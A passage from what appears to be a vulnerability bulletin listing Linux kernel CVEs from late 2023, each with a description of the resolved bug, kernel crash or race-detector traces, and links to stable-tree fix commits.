| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/vmem: split pages when debug pagealloc is enabled Since commit bb1520d581a3 ("s390/mm: start kernel with DAT enabled") the kernel crashes early during boot when debug pagealloc is enabled: mem auto-init: stack:off, heap alloc:off, heap free:off addressing exception: 0005 ilc:2 [#1] SMP DEBUG_PAGEALLOC Modules linked in: CPU: 0 PID: 0 Comm: swapper Not tainted 6.5.0-rc3-09759-gc5666c912155 #630 [..] Krnl Code: 00000000001325f6: ec5600248064 cgrj %r5,%r6,8,000000000013263e 00000000001325fc: eb880002000c srlg %r8,%r8,2 #0000000000132602: b2210051 ipte %r5,%r1,%r0,0 >0000000000132606: b90400d1 lgr %r13,%r1 000000000013260a: 41605008 la %r6,8(%r5) 000000000013260e: a7db1000 aghi %r13,4096 0000000000132612: b221006d ipte %r6,%r13,%r0,0 0000000000132616: e3d0d0000171 lay %r13,4096(%r13) Call Trace: __kernel_map_pages+0x14e/0x320 __free_pages_ok+0x23a/0x5a8) free_low_memory_core_early+0x214/0x2c8 memblock_free_all+0x28/0x58 mem_init+0xb6/0x228 mm_core_init+0xb6/0x3b0 start_kernel+0x1d2/0x5a8 startup_continue+0x36/0x40 Kernel panic - not syncing: Fatal exception: panic_on_oops This is caused by using large mappings on machines with EDAT1/EDAT2. Add the code to split the mappings into 4k pages if debug pagealloc is enabled by CONFIG_DEBUG_PAGEALLOC_ENABLE_DEFAULT or the debug_pagealloc kernel command line option. | 2025-12-30 | not yet calculated | CVE-2023-54278 | https://git.kernel.org/stable/c/601e467e29a960f7ab7ec4075afc6a68c3532a65 https://git.kernel.org/stable/c/edc1e4b6e26536868ef819a735e04a5b32c10589 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: MIPS: fw: Allow firmware to pass an empty env fw_getenv will use env entry to determine style of env, however it is legal for firmware to just pass an empty list. Check if first entry exists before running strchr to avoid null pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54279 | https://git.kernel.org/stable/c/f334b31625683418aaa2a335470eec950a95a254 https://git.kernel.org/stable/c/830181ddced5a05a711dc9da8043203b1f33a77e https://git.kernel.org/stable/c/0f91290774c798199ba4b8df93de5c3156b5163d https://git.kernel.org/stable/c/47e61cadc7a5f3dffd42d2d6fda81be163f1ab82 https://git.kernel.org/stable/c/3ef93b7bd9e042db240843f24a80e14da38c6830 https://git.kernel.org/stable/c/a6b54af407873227caef6262e992f5422cdcb6ae https://git.kernel.org/stable/c/ad79828f133e98585ab2236cad04a55eb7141bbe https://git.kernel.org/stable/c/aeed787bbbbe1b842beec9a065a36c915226f704 https://git.kernel.org/stable/c/ee1809ed7bc456a72dc8410b475b73021a3a68d5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: fix potential race when tree connecting ipc Protect access of TCP_Server_Info::hostname when building the ipc tree name as it might get freed in cifsd thread and thus cause a use-after-free bug in __tree_connect_dfs_target(). Also, while at it, update status of IPC tcon on success and then avoid any extra tree connects. | 2025-12-30 | not yet calculated | CVE-2023-54280 | https://git.kernel.org/stable/c/536ec71ba060a02fabe8e22cecb82fe7b3a8708b https://git.kernel.org/stable/c/553476df55a111e6a66ad9155256aec0ec1b7ad0 https://git.kernel.org/stable/c/ee20d7c6100752eaf2409d783f4f1449c29ea33d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: release path before inode lookup during the ino lookup ioctl During the ino lookup ioctl we can end up calling btrfs_iget() to get an inode reference while we are holding on a root's btree. If btrfs_iget() needs to lookup the inode from the root's btree, because it's not currently loaded in memory, then it will need to lock another or the same path in the same root btree. This may result in a deadlock and trigger the following lockdep splat: WARNING: possible circular locking dependency detected 6.5.0-rc7-syzkaller-00004-gf7757129e3de #0 Not tainted ------------------------------------------------------ syz-executor277/5012 is trying to acquire lock: ffff88802df41710 (btrfs-tree-01){++++}-{3:3}, at: __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136 but task is already holding lock: ffff88802df418e8 (btrfs-tree-00){++++}-{3:3}, at: __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #1 (btrfs-tree-00){++++}-{3:3}: down_read_nested+0x49/0x2f0 kernel/locking/rwsem.c:1645 __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136 btrfs_search_slot+0x13a4/0x2f80 fs/btrfs/ctree.c:2302 btrfs_init_root_free_objectid+0x148/0x320 fs/btrfs/disk-io.c:4955 btrfs_init_fs_root fs/btrfs/disk-io.c:1128 [inline] btrfs_get_root_ref+0x5ae/0xae0 fs/btrfs/disk-io.c:1338 btrfs_get_fs_root fs/btrfs/disk-io.c:1390 [inline] open_ctree+0x29c8/0x3030 fs/btrfs/disk-io.c:3494 btrfs_fill_super+0x1c7/0x2f0 fs/btrfs/super.c:1154 btrfs_mount_root+0x7e0/0x910 fs/btrfs/super.c:1519 legacy_get_tree+0xef/0x190 fs/fs_context.c:611 vfs_get_tree+0x8c/0x270 fs/super.c:1519 fc_mount fs/namespace.c:1112 [inline] vfs_kern_mount+0xbc/0x150 fs/namespace.c:1142 btrfs_mount+0x39f/0xb50 fs/btrfs/super.c:1579 legacy_get_tree+0xef/0x190 fs/fs_context.c:611 vfs_get_tree+0x8c/0x270 fs/super.c:1519 do_new_mount+0x28f/0xae0 fs/namespace.c:3335 do_mount fs/namespace.c:3675 [inline] __do_sys_mount fs/namespace.c:3884 [inline] __se_sys_mount+0x2d9/0x3c0 fs/namespace.c:3861 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd -> #0 (btrfs-tree-01){++++}-{3:3}: check_prev_add kernel/locking/lockdep.c:3142 [inline] check_prevs_add kernel/locking/lockdep.c:3261 [inline] validate_chain kernel/locking/lockdep.c:3876 [inline] __lock_acquire+0x39ff/0x7f70 kernel/locking/lockdep.c:5144 lock_acquire+0x1e3/0x520 kernel/locking/lockdep.c:5761 down_read_nested+0x49/0x2f0 kernel/locking/rwsem.c:1645 __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136 btrfs_tree_read_lock fs/btrfs/locking.c:142 [inline] btrfs_read_lock_root_node+0x292/0x3c0 fs/btrfs/locking.c:281 btrfs_search_slot_get_root fs/btrfs/ctree.c:1832 [inline] btrfs_search_slot+0x4ff/0x2f80 fs/btrfs/ctree.c:2154 btrfs_lookup_inode+0xdc/0x480 fs/btrfs/inode-item.c:412 btrfs_read_locked_inode fs/btrfs/inode.c:3892 [inline] btrfs_iget_path+0x2d9/0x1520 fs/btrfs/inode.c:5716 btrfs_search_path_in_tree_user fs/btrfs/ioctl.c:1961 [inline] btrfs_ioctl_ino_lookup_user+0x77a/0xf50 fs/btrfs/ioctl.c:2105 btrfs_ioctl+0xb0b/0xd40 fs/btrfs/ioctl.c:4683 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:870 [inline] __se_sys_ioctl+0xf8/0x170 fs/ioctl.c:856 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd other info ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54281 | https://git.kernel.org/stable/c/7390bb377b5fb3be23cb021e0f184d1f576be7d6 https://git.kernel.org/stable/c/380bbd46d61c894a8dcaace09e54bc7426d81014 https://git.kernel.org/stable/c/50e385d98b2a52480836ea41c142b81eeeb277af https://git.kernel.org/stable/c/6fdce81e425be112f1ca129776f4041afeaad413 https://git.kernel.org/stable/c/ee34a82e890a7babb5585daf1a6dd7d4d1cf142a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: tuners: qt1010: replace BUG_ON with a regular error BUG_ON is unnecessary here, and in addition it confuses smatch. Replacing this with an error return help resolve this smatch warning: drivers/media/tuners/qt1010.c:350 qt1010_init() error: buffer overflow 'i2c_data' 34 <= 34 | 2025-12-30 | not yet calculated | CVE-2023-54282 | https://git.kernel.org/stable/c/6cae780862d221106626b2b5fb21a197f398c6ec https://git.kernel.org/stable/c/f844bc3a47d8d1c55a4a9cfca38c538e9df7e678 https://git.kernel.org/stable/c/641e60223971e95472a2a9646b1e7f94d441de45 https://git.kernel.org/stable/c/2ae53dd15eef90d34fc084b5b2305a67bb675a26 https://git.kernel.org/stable/c/48bb6a9fa5cb150ac2a22b3c779c96bc0ed21071 https://git.kernel.org/stable/c/257092cb544c7843376b3e161f789e666ef06c98 https://git.kernel.org/stable/c/1a6bf53fffe0b7ebe2a0f402b44f14f90cffd164 https://git.kernel.org/stable/c/ee630b29ea44d1851bb6c903f400956604834463 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Address KCSAN report on bpf_lru_list KCSAN reported a data-race when accessing node->ref. Although node->ref does not have to be accurate, take this chance to use a more common READ_ONCE() and WRITE_ONCE() pattern instead of data_race(). There is an existing bpf_lru_node_is_ref() and bpf_lru_node_set_ref(). This patch also adds bpf_lru_node_clear_ref() to do the WRITE_ONCE(node->ref, 0) also. ================================================================== BUG: KCSAN: data-race in __bpf_lru_list_rotate / __htab_lru_percpu_map_update_elem write to 0xffff888137038deb of 1 bytes by task 11240 on cpu 1: __bpf_lru_node_move kernel/bpf/bpf_lru_list.c:113 [inline] __bpf_lru_list_rotate_active kernel/bpf/bpf_lru_list.c:149 [inline] __bpf_lru_list_rotate+0x1bf/0x750 kernel/bpf/bpf_lru_list.c:240 bpf_lru_list_pop_free_to_local kernel/bpf/bpf_lru_list.c:329 [inline] bpf_common_lru_pop_free kernel/bpf/bpf_lru_list.c:447 [inline] bpf_lru_pop_free+0x638/0xe20 kernel/bpf/bpf_lru_list.c:499 prealloc_lru_pop kernel/bpf/hashtab.c:290 [inline] __htab_lru_percpu_map_update_elem+0xe7/0x820 kernel/bpf/hashtab.c:1316 bpf_percpu_hash_update+0x5e/0x90 kernel/bpf/hashtab.c:2313 bpf_map_update_value+0x2a9/0x370 kernel/bpf/syscall.c:200 generic_map_update_batch+0x3ae/0x4f0 kernel/bpf/syscall.c:1687 bpf_map_do_batch+0x2d9/0x3d0 kernel/bpf/syscall.c:4534 __sys_bpf+0x338/0x810 __do_sys_bpf kernel/bpf/syscall.c:5096 [inline] __se_sys_bpf kernel/bpf/syscall.c:5094 [inline] __x64_sys_bpf+0x43/0x50 kernel/bpf/syscall.c:5094 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd read to 0xffff888137038deb of 1 bytes by task 11241 on cpu 0: bpf_lru_node_set_ref kernel/bpf/bpf_lru_list.h:70 [inline] __htab_lru_percpu_map_update_elem+0x2f1/0x820 kernel/bpf/hashtab.c:1332 bpf_percpu_hash_update+0x5e/0x90 kernel/bpf/hashtab.c:2313 bpf_map_update_value+0x2a9/0x370 kernel/bpf/syscall.c:200 generic_map_update_batch+0x3ae/0x4f0 kernel/bpf/syscall.c:1687 bpf_map_do_batch+0x2d9/0x3d0 kernel/bpf/syscall.c:4534 __sys_bpf+0x338/0x810 __do_sys_bpf kernel/bpf/syscall.c:5096 [inline] __se_sys_bpf kernel/bpf/syscall.c:5094 [inline] __x64_sys_bpf+0x43/0x50 kernel/bpf/syscall.c:5094 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd value changed: 0x01 -> 0x00 Reported by Kernel Concurrency Sanitizer on: CPU: 0 PID: 11241 Comm: syz-executor.3 Not tainted 6.3.0-rc7-syzkaller-00136-g6a66fdd29ea1 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/30/2023 ================================================================== | 2025-12-30 | not yet calculated | CVE-2023-54283 | https://git.kernel.org/stable/c/6eaef1b1d8720053eb1b6e7a3ff8b2ff0716bb90 https://git.kernel.org/stable/c/a89d14410ea0352420f03cddc67e0002dcc8f9a5 https://git.kernel.org/stable/c/e09a285ea1e859d4cc6cb689d8d5d7c1f7c7c0d5 https://git.kernel.org/stable/c/b6d9a4062c944ad095b34dc112bf646a84156f60 https://git.kernel.org/stable/c/819ca25444b377935faa2dbb0aa3547519b5c80f https://git.kernel.org/stable/c/c006fe361cfd947f51a56793deddf891e5cbfef8 https://git.kernel.org/stable/c/6e5e83b56f50fbd1c8f7dca7df7d72c67be25571 https://git.kernel.org/stable/c/ee9fd0ac3017c4313be91a220a9ac4c99dde7ad4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: av7110: prevent underflow in write_ts_to_decoder() The buf[4] value comes from the user via ts_play(). It is a value in the u8 range. The final length we pass to av7110_ipack_instant_repack() is "len - (buf[4] + 1) - 4" so add a check to ensure that the length is not negative. It's not clear that passing a negative len value does anything bad necessarily, but it's not best practice. With the new bounds checking the "if (!len)" condition is no longer possible or required so remove that. | 2025-12-30 | not yet calculated | CVE-2023-54284 | https://git.kernel.org/stable/c/6680af5be9f08d830567e9118f76d3e64684db8f https://git.kernel.org/stable/c/6606e2404ee9e20a3ae5b42fc3660d41b739ed3e https://git.kernel.org/stable/c/620b983589e0223876bf1463b01100a9c67b56ba https://git.kernel.org/stable/c/86ba65e5357bfbb6c082f68b265a292ee1bdde1d https://git.kernel.org/stable/c/ca4ce92e3ec9fd3c7c936b912b95c53331d5159c https://git.kernel.org/stable/c/423350af9e27f005611bd881b1df2cab66de943d https://git.kernel.org/stable/c/77eeb4732135c18c2fdfab80839645b393f3e774 https://git.kernel.org/stable/c/7b93ab60fe9ed04be0ff155bc30ad39dea23e22b https://git.kernel.org/stable/c/eed9496a0501357aa326ddd6b71408189ed872eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iomap: Fix possible overflow condition in iomap_write_delalloc_scan folio_next_index() returns an unsigned long value which left shifted by PAGE_SHIFT could possibly cause an overflow on 32-bit system. Instead use folio_pos(folio) + folio_size(folio), which does this correctly. | 2025-12-30 | not yet calculated | CVE-2023-54285 | https://git.kernel.org/stable/c/5c281b0c5d18c8eeb1cfd5023f4adb153e6d1240 https://git.kernel.org/stable/c/eee2d2e6ea5550118170dbd5bb1316ceb38455fb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: dvm: Fix memcpy: detected field-spanning write backtrace A received TKIP key may be up to 32 bytes because it may contain MIC rx/tx keys too. These are not used by iwl and copying these over overflows the iwl_keyinfo.key field. Add a check to not copy more data to iwl_keyinfo.key than will fit. This fixes backtraces like this one: memcpy: detected field-spanning write (size 32) of single field "sta_cmd.key.key" at drivers/net/wireless/intel/iwlwifi/dvm/sta.c:1103 (size 16) WARNING: CPU: 1 PID: 946 at drivers/net/wireless/intel/iwlwifi/dvm/sta.c:1103 iwlagn_send_sta_key+0x375/0x390 [iwldvm] <snip> Hardware name: Dell Inc. Latitude E6430/0H3MT5, BIOS A21 05/08/2017 RIP: 0010:iwlagn_send_sta_key+0x375/0x390 [iwldvm] <snip> Call Trace: <TASK> iwl_set_dynamic_key+0x1f0/0x220 [iwldvm] iwlagn_mac_set_key+0x1e4/0x280 [iwldvm] drv_set_key+0xa4/0x1b0 [mac80211] ieee80211_key_enable_hw_accel+0xa8/0x2d0 [mac80211] ieee80211_key_replace+0x22d/0x8e0 [mac80211] <snip> | 2025-12-30 | not yet calculated | CVE-2023-54286 | https://git.kernel.org/stable/c/76b5ea43ad2fb4f726ddfaff839430a706e7d7c2 https://git.kernel.org/stable/c/3ed3c1c2fc3482b72e755820261779cd2e2c5a3e https://git.kernel.org/stable/c/fa57021262e998e2229d6383b1081638df2fe238 https://git.kernel.org/stable/c/91ad1ab3cc7e981cb6d6ee100686baed64e1277e https://git.kernel.org/stable/c/87940e4030e4705e1f3fd2bbb1854eae8308314b https://git.kernel.org/stable/c/57189c885149825be8eb8c3524b5af017fdeb941 https://git.kernel.org/stable/c/6cd644f66b43709816561d63e0173cb0c7aab159 https://git.kernel.org/stable/c/ef16799640865f937719f0771c93be5dca18adc6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tty: serial: imx: disable Ageing Timer interrupt request irq There may be a pending USR interrupt before requesting irq, however uart_add_one_port has not executed, so there will be a kernel panic: [ 0.795668] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000080 [ 0.802701] Mem abort info: [ 0.805367] ESR = 0x0000000096000004 [ 0.808950] EC = 0x25: DABT (current EL), IL = 32 bits [ 0.814033] SET = 0, FnV = 0 [ 0.816950] EA = 0, S1PTW = 0 [ 0.819950] FSC = 0x04: level 0 translation fault [ 0.824617] Data abort info: [ 0.827367] ISV = 0, ISS = 0x00000004 [ 0.831033] CM = 0, WnR = 0 [ 0.833866] [0000000000000080] user address but active_mm is swapper [ 0.839951] Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP [ 0.845953] Modules linked in: [ 0.848869] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 6.1.1+g56321e101aca #1 [ 0.855617] Hardware name: Freescale i.MX8MP EVK (DT) [ 0.860452] pstate: 000000c5 (nzcv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 0.867117] pc : __imx_uart_rxint.constprop.0+0x11c/0x2c0 [ 0.872283] lr : imx_uart_int+0xf8/0x1ec The issue only happens in the inmate linux when Jailhouse hypervisor enabled. The test procedure is: while true; do jailhouse enable imx8mp.cell jailhouse cell linux xxxx sleep 10 jailhouse cell destroy 1 jailhouse disable sleep 5 done And during the upper test, press keys to the 2nd linux console. When `jailhouse cell destroy 1`, the 2nd linux has no chance to put the uart to a quiesce state, so USR1/2 may have pending interrupts. Then when `jailhouse cell linux xx` to start 2nd linux again, the issue triggers. In order to disable irqs before requesting them, both UCR1 and UCR2 irqs should be disabled, so here fix that, disable the Ageing Timer interrupt in UCR2 as UCR1 does. | 2025-12-30 | not yet calculated | CVE-2023-54287 | https://git.kernel.org/stable/c/3d41d9b256ae626c0dc434427c8e32450358d3b4 https://git.kernel.org/stable/c/9795ece3a85ba9238191e97665586e2d79703ff3 https://git.kernel.org/stable/c/963875b0655197281775b0ea614aab8b6b3eb001 https://git.kernel.org/stable/c/ef25e16ea9674b713a68c3bda821556ce9901254 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: fortify the spinlock against deadlock by interrupt In the function ieee80211_tx_dequeue() there is a particular locking sequence: begin: spin_lock(&local->queue_stop_reason_lock); q_stopped = local->queue_stop_reasons[q]; spin_unlock(&local->queue_stop_reason_lock); However small the chance (increased by ftracetest), an asynchronous interrupt can occur between spin_lock() and spin_unlock(), and the interrupt routine will attempt to lock the same &local->queue_stop_reason_lock again. This will cause a costly reset of the CPU and the wifi device or an altogether hang in the single CPU and single core scenario. The only remaining spin_lock(&local->queue_stop_reason_lock) that did not disable interrupts was patched, which should prevent any deadlocks on the same CPU/core and the same wifi device. This is the probable trace of the deadlock: kernel: ================================ kernel: WARNING: inconsistent lock state kernel: 6.3.0-rc6-mt-20230401-00001-gf86822a1170f #4 Tainted: G W kernel: -------------------------------- kernel: inconsistent {IN-SOFTIRQ-W} -> {SOFTIRQ-ON-W} usage. kernel: kworker/5:0/25656 [HC0[0]:SC0[0]:HE1:SE1] takes: kernel: ffff9d6190779478 (&local->queue_stop_reason_lock){+.?.}-{2:2}, at: return_to_handler+0x0/0x40 kernel: {IN-SOFTIRQ-W} state was registered at: kernel: lock_acquire+0xc7/0x2d0 kernel: _raw_spin_lock+0x36/0x50 kernel: ieee80211_tx_dequeue+0xb4/0x1330 [mac80211] kernel: iwl_mvm_mac_itxq_xmit+0xae/0x210 [iwlmvm] kernel: iwl_mvm_mac_wake_tx_queue+0x2d/0xd0 [iwlmvm] kernel: ieee80211_queue_skb+0x450/0x730 [mac80211] kernel: __ieee80211_xmit_fast.constprop.66+0x834/0xa50 [mac80211] kernel: __ieee80211_subif_start_xmit+0x217/0x530 [mac80211] kernel: ieee80211_subif_start_xmit+0x60/0x580 [mac80211] kernel: dev_hard_start_xmit+0xb5/0x260 kernel: __dev_queue_xmit+0xdbe/0x1200 kernel: neigh_resolve_output+0x166/0x260 kernel: ip_finish_output2+0x216/0xb80 kernel: __ip_finish_output+0x2a4/0x4d0 kernel: ip_finish_output+0x2d/0xd0 kernel: ip_output+0x82/0x2b0 kernel: ip_local_out+0xec/0x110 kernel: igmpv3_sendpack+0x5c/0x90 kernel: igmp_ifc_timer_expire+0x26e/0x4e0 kernel: call_timer_fn+0xa5/0x230 kernel: run_timer_softirq+0x27f/0x550 kernel: __do_softirq+0xb4/0x3a4 kernel: irq_exit_rcu+0x9b/0xc0 kernel: sysvec_apic_timer_interrupt+0x80/0xa0 kernel: asm_sysvec_apic_timer_interrupt+0x1f/0x30 kernel: _raw_spin_unlock_irqrestore+0x3f/0x70 kernel: free_to_partial_list+0x3d6/0x590 kernel: __slab_free+0x1b7/0x310 kernel: kmem_cache_free+0x52d/0x550 kernel: putname+0x5d/0x70 kernel: do_sys_openat2+0x1d7/0x310 kernel: do_sys_open+0x51/0x80 kernel: __x64_sys_openat+0x24/0x30 kernel: do_syscall_64+0x5c/0x90 kernel: entry_SYSCALL_64_after_hwframe+0x72/0xdc kernel: irq event stamp: 5120729 kernel: hardirqs last enabled at (5120729): [<ffffffff9d149936>] trace_graph_return+0xd6/0x120 kernel: hardirqs last disabled at (5120728): [<ffffffff9d149950>] trace_graph_return+0xf0/0x120 kernel: softirqs last enabled at (5069900): [<ffffffff9cf65b60>] return_to_handler+0x0/0x40 kernel: softirqs last disabled at (5067555): [<ffffffff9cf65b60>] return_to_handler+0x0/0x40 kernel: other info that might help us debug this: kernel: Possible unsafe locking scenario: kernel: CPU0 kernel: ---- kernel: lock(&local->queue_stop_reason_lock); kernel: <Interrupt> kernel: lock(&local->queue_stop_reason_lock); kernel: *** DEADLOCK *** kernel: 8 locks held by kworker/5:0/25656: kernel: #0: ffff9d618009d138 ((wq_completion)events_freezable){+.+.}-{0:0}, at: process_one_work+0x1ca/0x530 kernel: #1: ffffb1ef4637fe68 ((work_completion)(&local->restart_work)){+.+.}-{0:0}, at: process_one_work+0x1ce/0x530 kernel: #2: ffffffff9f166548 (rtnl_mutex){+.+.}-{3:3}, at: return_to_handler+0x0/0x40 kernel: #3: ffff9d619 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54288 | https://git.kernel.org/stable/c/c79d794a2cd76eca47b2491c5030be9a6418c5d6 https://git.kernel.org/stable/c/6df3eafa31b3ee4f0cba601ca857019964355034 https://git.kernel.org/stable/c/ef6e1997da63ad0ac3fe33153fec9524c9ae56c9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qedf: Fix NULL dereference in error handling Smatch reported: drivers/scsi/qedf/qedf_main.c:3056 qedf_alloc_global_queues() warn: missing unwind goto? At this point in the function, nothing has been allocated so we can return directly. In particular the "qedf->global_queues" have not been allocated so calling qedf_free_global_queues() will lead to a NULL dereference when we check if (!gl[i]) and "gl" is NULL. | 2025-12-30 | not yet calculated | CVE-2023-54289 | https://git.kernel.org/stable/c/961c8370c5f7e80a267680476e1bcff34bffe71a https://git.kernel.org/stable/c/ac64019e4d4b08c23edb117e0b2590985e33de1d https://git.kernel.org/stable/c/b1de5105d29b145b727b797e2d5de071ab3a7ca1 https://git.kernel.org/stable/c/c316bde418af4c2a9df51149ed01d1bd8ca5bebf https://git.kernel.org/stable/c/08c001c1e9444a3046c79a99aa93ac48073b18cc https://git.kernel.org/stable/c/271c9b2eb60149afbeab28cb39e52f73bde9900c https://git.kernel.org/stable/c/f025312b089474a54e4859f3453771314d9e3d4f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vduse: fix NULL pointer dereference vduse_vdpa_set_vq_affinity callback can be called with NULL value as cpu_mask when deleting the vduse device. This patch resets virtqueue's IRQ affinity mask value to set all CPUs instead of dereferencing NULL cpu_mask. [ 4760.952149] BUG: kernel NULL pointer dereference, address: 0000000000000000 [ 4760.959110] #PF: supervisor read access in kernel mode [ 4760.964247] #PF: error_code(0x0000) - not-present page [ 4760.969385] PGD 0 P4D 0 [ 4760.971927] Oops: 0000 [#1] PREEMPT SMP PTI [ 4760.976112] CPU: 13 PID: 2346 Comm: vdpa Not tainted 6.4.0-rc6+ #4 [ 4760.982291] Hardware name: Dell Inc. PowerEdge R640/0W23H8, BIOS 2.8.1 06/26/2020 [ 4760.989769] RIP: 0010:memcpy_orig+0xc5/0x130 [ 4760.994049] Code: 16 f8 4c 89 07 4c 89 4f 08 4c 89 54 17 f0 4c 89 5c 17 f8 c3 cc cc cc cc 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 83 fa 08 72 1b <4c> 8b 06 4c 8b 4c 16 f8 4c 89 07 4c 89 4c 17 f8 c3 cc cc cc cc 66 [ 4761.012793] RSP: 0018:ffffb1d565abb830 EFLAGS: 00010246 [ 4761.018020] RAX: ffff9f4bf6b27898 RBX: ffff9f4be23969c0 RCX: ffff9f4bcadf6400 [ 4761.025152] RDX: 0000000000000008 RSI: 0000000000000000 RDI: ffff9f4bf6b27898 [ 4761.032286] RBP: 0000000000000000 R08: 0000000000000008 R09: 0000000000000000 [ 4761.039416] R10: 0000000000000000 R11: 0000000000000600 R12: 0000000000000000 [ 4761.046549] R13: 0000000000000000 R14: 0000000000000080 R15: ffffb1d565abbb10 [ 4761.053680] FS: 00007f64c2ec2740(0000) GS:ffff9f635f980000(0000) knlGS:0000000000000000 [ 4761.061765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 4761.067513] CR2: 0000000000000000 CR3: 0000001875270006 CR4: 00000000007706e0 [ 4761.074645] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 4761.081775] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 4761.088909] PKRU: 55555554 [ 4761.091620] Call Trace: [ 4761.094074] <TASK> [ 4761.096180] ? __die+0x1f/0x70 [ 4761.099238] ? page_fault_oops+0x171/0x4f0 [ 4761.103340] ? exc_page_fault+0x7b/0x180 [ 4761.107265] ? asm_exc_page_fault+0x22/0x30 [ 4761.111460] ? memcpy_orig+0xc5/0x130 [ 4761.115126] vduse_vdpa_set_vq_affinity+0x3e/0x50 [vduse] [ 4761.120533] virtnet_clean_affinity.part.0+0x3d/0x90 [virtio_net] [ 4761.126635] remove_vq_common+0x1a4/0x250 [virtio_net] [ 4761.131781] virtnet_remove+0x5d/0x70 [virtio_net] [ 4761.136580] virtio_dev_remove+0x3a/0x90 [ 4761.140509] device_release_driver_internal+0x19b/0x200 [ 4761.145742] bus_remove_device+0xc2/0x130 [ 4761.149755] device_del+0x158/0x3e0 [ 4761.153245] ? kernfs_find_ns+0x35/0xc0 [ 4761.157086] device_unregister+0x13/0x60 [ 4761.161010] unregister_virtio_device+0x11/0x20 [ 4761.165543] device_release_driver_internal+0x19b/0x200 [ 4761.170770] bus_remove_device+0xc2/0x130 [ 4761.174782] device_del+0x158/0x3e0 [ 4761.178276] ? __pfx_vdpa_name_match+0x10/0x10 [vdpa] [ 4761.183336] device_unregister+0x13/0x60 [ 4761.187260] vdpa_nl_cmd_dev_del_set_doit+0x63/0xe0 [vdpa] | 2025-12-30 | not yet calculated | CVE-2023-54291 | https://git.kernel.org/stable/c/f9d46429de2a251e1e4962e1bf86c344d6336562 https://git.kernel.org/stable/c/f06cf1e1a503169280467d12d2ec89bf2c30ace7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Fix data race on CQP request done KCSAN detects a data race on cqp_request->request_done memory location which is accessed locklessly in irdma_handle_cqp_op while being updated in irdma_cqp_ce_handler. Annotate lockless intent with READ_ONCE/WRITE_ONCE to avoid any compiler optimizations like load fusing and/or KCSAN warning. [222808.417128] BUG: KCSAN: data-race in irdma_cqp_ce_handler [irdma] / irdma_wait_event [irdma] [222808.417532] write to 0xffff8e44107019dc of 1 bytes by task 29658 on cpu 5: [222808.417610] irdma_cqp_ce_handler+0x21e/0x270 [irdma] [222808.417725] cqp_compl_worker+0x1b/0x20 [irdma] [222808.417827] process_one_work+0x4d1/0xa40 [222808.417835] worker_thread+0x319/0x700 [222808.417842] kthread+0x180/0x1b0 [222808.417852] ret_from_fork+0x22/0x30 [222808.417918] read to 0xffff8e44107019dc of 1 bytes by task 29688 on cpu 1: [222808.417995] irdma_wait_event+0x1e2/0x2c0 [irdma] [222808.418099] irdma_handle_cqp_op+0xae/0x170 [irdma] [222808.418202] irdma_cqp_cq_destroy_cmd+0x70/0x90 [irdma] [222808.418308] irdma_puda_dele_rsrc+0x46d/0x4d0 [irdma] [222808.418411] irdma_rt_deinit_hw+0x179/0x1d0 [irdma] [222808.418514] irdma_ib_dealloc_device+0x11/0x40 [irdma] [222808.418618] ib_dealloc_device+0x2a/0x120 [ib_core] [222808.418823] __ib_unregister_device+0xde/0x100 [ib_core] [222808.418981] ib_unregister_device+0x22/0x40 [ib_core] [222808.419142] irdma_ib_unregister_device+0x70/0x90 [irdma] [222808.419248] i40iw_close+0x6f/0xc0 [irdma] [222808.419352] i40e_client_device_unregister+0x14a/0x180 [i40e] [222808.419450] i40iw_remove+0x21/0x30 [irdma] [222808.419554] auxiliary_bus_remove+0x31/0x50 [222808.419563] device_remove+0x69/0xb0 [222808.419572] device_release_driver_internal+0x293/0x360 [222808.419582] driver_detach+0x7c/0xf0 [222808.419592] bus_remove_driver+0x8c/0x150 [222808.419600] driver_unregister+0x45/0x70 [222808.419610] auxiliary_driver_unregister+0x16/0x30 [222808.419618] 